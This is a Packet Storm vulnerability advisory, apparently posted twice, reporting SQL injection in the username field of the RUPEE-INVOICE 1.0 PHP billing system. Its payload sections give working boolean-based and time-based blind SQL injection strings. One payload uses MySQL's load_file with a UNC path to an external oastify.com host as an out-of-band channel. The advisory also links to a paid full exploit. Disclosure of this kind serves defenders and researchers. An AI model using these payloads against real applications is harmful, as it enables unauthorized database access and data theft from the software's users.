Description
Rupee................................................
Basic Information
ID
PACKETSTORM:209297
Published
Sep 9, 2025 at 00:00
Affected Product
Affected Versions
# Titles: RUPEE-INVOICE-1.0-Multiple-SQLi
# Author: nu11secur1ty
# Date: 09/09/2025
# Vendor: https://www.mayurik.com/
# Software:
https://www.sourcecodester.com/download-code?nid=14831&title=Billing+System+Project+in+PHP+Source+Code+Free+Download
# Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `username` parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select load_file('\\\\
jj6w9rad6kc8twwcn1qlthm4cvio6f9306oybozd.oastify.com\\htc'))+' was
submitted in the username parameter. This payload injects a SQL sub-query
that calls MySQL's load_file function with a UNC file path that references
a URL on an external domain. The application interacted with that domain,
indicating that the injected SQL query was executed.
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
- SQLi:
```SQLi
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=hPpqTCiq'+(select load_file('\\\\
jj6w9rad6kc8twwcn1qlthm4cvio6f9306oybozd.oastify.com\\htc'))+'' OR NOT
5577=5577 AND 'YwXM'='YwXM&password=i8Z!y4e!U3&login=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=hPpqTCiq'+(select load_file('\\\\
jj6w9rad6kc8twwcn1qlthm4cvio6f9306oybozd.oastify.com\\htc'))+'' AND (SELECT
2676 FROM (SELECT(SLEEP(11)))lelL) AND
'AykD'='AykD&password=i8Z!y4e!U3&login=
---
```
# Reproduce:
[href](https://www.patreon.com/posts/rupee-invoice-1-138493095)
# Buy an exploit only:
[href](https://www.patreon.com/posts/rupee-invoice-1-138493095)
# Time spent:
01:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Author: nu11secur1ty
# Date: 09/09/2025
# Vendor: https://www.mayurik.com/
# Software:
https://www.sourcecodester.com/download-code?nid=14831&title=Billing+System+Project+in+PHP+Source+Code+Free+Download
# Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `username` parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select load_file('\\\\
jj6w9rad6kc8twwcn1qlthm4cvio6f9306oybozd.oastify.com\\htc'))+' was
submitted in the username parameter. This payload injects a SQL sub-query
that calls MySQL's load_file function with a UNC file path that references
a URL on an external domain. The application interacted with that domain,
indicating that the injected SQL query was executed.
STATUS: HIGH-CRITICAL Vulnerability
[+]Payload:
- SQLi:
```SQLi
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: username=hPpqTCiq'+(select load_file('\\\\
jj6w9rad6kc8twwcn1qlthm4cvio6f9306oybozd.oastify.com\\htc'))+'' OR NOT
5577=5577 AND 'YwXM'='YwXM&password=i8Z!y4e!U3&login=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=hPpqTCiq'+(select load_file('\\\\
jj6w9rad6kc8twwcn1qlthm4cvio6f9306oybozd.oastify.com\\htc'))+'' AND (SELECT
2676 FROM (SELECT(SLEEP(11)))lelL) AND
'AykD'='AykD&password=i8Z!y4e!U3&login=
---
```
# Reproduce:
[href](https://www.patreon.com/posts/rupee-invoice-1-138493095)
# Buy an exploit only:
[href](https://www.patreon.com/posts/rupee-invoice-1-138493095)
# Time spent:
01:15:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>